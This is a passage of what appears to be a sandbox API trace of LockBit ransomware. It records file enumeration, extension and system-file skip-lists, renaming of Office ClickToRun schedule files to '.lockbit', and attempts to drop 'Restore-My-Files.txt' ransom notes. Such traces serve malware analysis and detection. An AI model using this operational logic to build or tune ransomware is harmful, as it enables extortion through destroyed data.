lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.721] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17ffdd50, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17ffdd50, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x7ace5200, ftLastWriteTime.dwHighDateTime=0x1d098c7, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0076.721] lstrcmpiW (lpString1=".", lpString2="msvcp120.dll") returned -1 [0076.721] lstrcmpiW (lpString1="..", lpString2="msvcp120.dll") returned -1 [0076.721] PathFindExtensionW (pszPath="msvcp120.dll") returned=".dll" [0076.721] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.721] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.721] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.722] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.722] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.722] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.722] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.722] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.722] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17ffdd50, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x17ffdd50, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x588a4500, ftLastWriteTime.dwHighDateTime=0x1d0c595, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0076.723] lstrcmpiW (lpString1=".", lpString2="msvcp140.dll") returned -1 [0076.723] lstrcmpiW (lpString1="..", lpString2="msvcp140.dll") returned -1 [0076.723] PathFindExtensionW (pszPath="msvcp140.dll") returned=".dll" [0076.723] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.723] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.723] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.723] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.723] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.723] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.723] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.723] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.723] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.723] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18023eb0, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x18023eb0, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x7d30ac00, ftLastWriteTime.dwHighDateTime=0x1d098c7, nFileSizeHigh=0x0, nFileSizeLow=0xeb2a8, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="msvcr120.dll", cAlternateFileName="")) returned 1 [0076.723] lstrcmpiW (lpString1=".", lpString2="msvcr120.dll") returned -1 [0076.723] lstrcmpiW (lpString1="..", lpString2="msvcr120.dll") returned -1 [0076.723] PathFindExtensionW (pszPath="msvcr120.dll") returned=".dll" [0076.723] PathFindExtensionW (pszPath="OfficeC2RClient.exe") returned=".exe" [0076.724] PathFindExtensionW (pszPath="OfficeC2RCom.dll") returned=".dll" [0076.724] PathFindExtensionW (pszPath="OfficeClickToRun.exe") returned=".exe" [0076.724] PathFindExtensionW (pszPath="OfficeUpdateSchedule.xml") returned=".xml" [0076.724] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.724] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="OfficeUpdateSchedule.xml") returned 1 [0076.724] lstrcmpiW (lpString1="ntldr", lpString2="OfficeUpdateSchedule.xml") returned -1 [0076.724] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="OfficeUpdateSchedule.xml") returned -1 [0076.724] lstrcmpiW (lpString1="bootsect.bak", lpString2="OfficeUpdateSchedule.xml") returned -1 [0076.724] lstrcmpiW (lpString1="autorun.inf", lpString2="OfficeUpdateSchedule.xml") returned -1 [0076.724] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") returned="" [0076.724] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned=".xml" [0076.724] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0076.724] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0076.724] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0076.725] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0076.725] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeUpdateSchedule.xml.lockbit") returned 91 [0076.725] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0076.725] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeUpdateSchedule.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.lockbit")) returned 1 [0076.727] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeUpdateSchedule.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0076.727] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.727] malloc (_Size=0x40068) returned 0x3940048 [0076.729] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=4782) returned 1 [0076.729] ReadFile (in: hFile=0x3ac, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 0x0 [0076.735] GetLastError () returned 0x3e5 [0076.735] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\OfficeUpdateSchedule.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun") returned 1 [0076.736] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt") returned 79 [0076.736] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.736] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab8dab90, ftCreationTime.dwHighDateTime=0x1bf53f3, ftLastAccessTime.dwLowDateTime=0xab8dab90, ftLastAccessTime.dwHighDateTime=0x1bf53f3, ftLastWriteTime.dwLowDateTime=0xab8dab90, ftLastWriteTime.dwHighDateTime=0x1bf53f3, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="Restore-My-Files.txt", cAlternateFileName="RESTOR~1.TXT")) returned 1 [0076.736] lstrcmpiW (lpString1=".", lpString2="Restore-My-Files.txt") returned -1 [0076.736] lstrcmpiW (lpString1="..", lpString2="Restore-My-Files.txt") returned -1 [0076.736] PathFindExtensionW (pszPath="Restore-My-Files.txt") returned=".txt" [0076.736] lstrcmpiW (lpString1=".386", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".cmd", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".exe", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".ani", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".adv", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".theme", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".msi", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".msp", lpString2=".txt") returned -1 [0076.736] lstrcmpiW (lpString1=".com", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".diagpkg", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".nls", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".diagcab", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".lock", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".ocx", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".mpa", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".cpl", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".mod", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".hta", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".icns", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".prf", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".rtp", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".diagcfg", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".msstyles", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".bin", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".shs", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".drv", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".wpx", lpString2=".txt") returned 1 [0076.737] lstrcmpiW (lpString1=".bat", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".rom", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".msc", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".spl", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".ps1", lpString2=".txt") returned -1 [0076.737] lstrcmpiW (lpString1=".msu", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".ics", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".key", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".mp3", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".reg", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".dll", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".ini", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".idx", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".sys", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".hlp", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".ico", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".lnk", lpString2=".txt") returned -1 [0076.738] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0076.738] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.738] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0076.738] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180e2590, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x180e2590, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0xe0efaf10, ftLastWriteTime.dwHighDateTime=0x1d70910, nFileSizeHigh=0x0, nFileSizeLow=0x1162, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ServiceWatcherSchedule.xml", cAlternateFileName="SERVIC~1.XML")) returned 1 [0076.738] lstrcmpiW (lpString1=".", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.738] lstrcmpiW (lpString1="..", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.738] PathFindExtensionW (pszPath="ServiceWatcherSchedule.xml") returned=".xml" [0076.738] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0076.738] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0076.738] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0076.738] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0076.738] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0076.738] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0076.739] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0076.740] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0076.740] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.740] lstrcmpiW (lpString1="ntldr", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.740] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.740] lstrcmpiW (lpString1="bootsect.bak", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.740] lstrcmpiW (lpString1="autorun.inf", lpString2="ServiceWatcherSchedule.xml") returned -1 [0076.740] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\") returned="" [0076.740] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ServiceWatcherSchedule.xml") returned=".xml" [0076.740] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0076.740] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0076.740] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0076.741] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0076.741] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ServiceWatcherSchedule.xml.lockbit") returned 93 [0076.741] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0076.741] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ServiceWatcherSchedule.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.lockbit")) returned 1 [0076.743] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ServiceWatcherSchedule.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0076.743] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0076.744] malloc (_Size=0x40068) returned 0x39800b8 [0076.745] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x39800d0 | out: lpFileSize=0x39800d0*=4450) returned 1 [0076.745] ReadFile (in: hFile=0x3b0, lpBuffer=0x39800ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x39800b8 | out: lpBuffer=0x39800ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x39800b8) returned 1 [0076.879] GetLastError () returned 0x3e5 [0076.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\ServiceWatcherSchedule.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun") returned 1 [0076.880] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt") returned 79 [0076.894] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.894] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x180e2590, ftCreationTime.dwHighDateTime=0x1d70910, ftLastAccessTime.dwLowDateTime=0x180e2590, ftLastAccessTime.dwHighDateTime=0x1d70910, ftLastWriteTime.dwLowDateTime=0x20031300, ftLastWriteTime.dwHighDateTime=0x1d0d7b1, nFileSizeHigh=0x0, nFileSizeLow=0x101458, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="StreamServer.dll", cAlternateFileName="STREAM~1.DLL")) returned 1 [0076.894] lstrcmpiW (lpString1=".", lpString2="StreamServer.dll") returned -1 [0076.894] lstrcmpiW (lpString1="..", lpString2="StreamServer.dll") returned -1 [0076.894] PathFindExtensionW (pszPath="StreamServer.dll") returned=".dll" [0076.894] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.894] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.894] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.895] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.895] lstrcmpiW (lpString1=".nls", 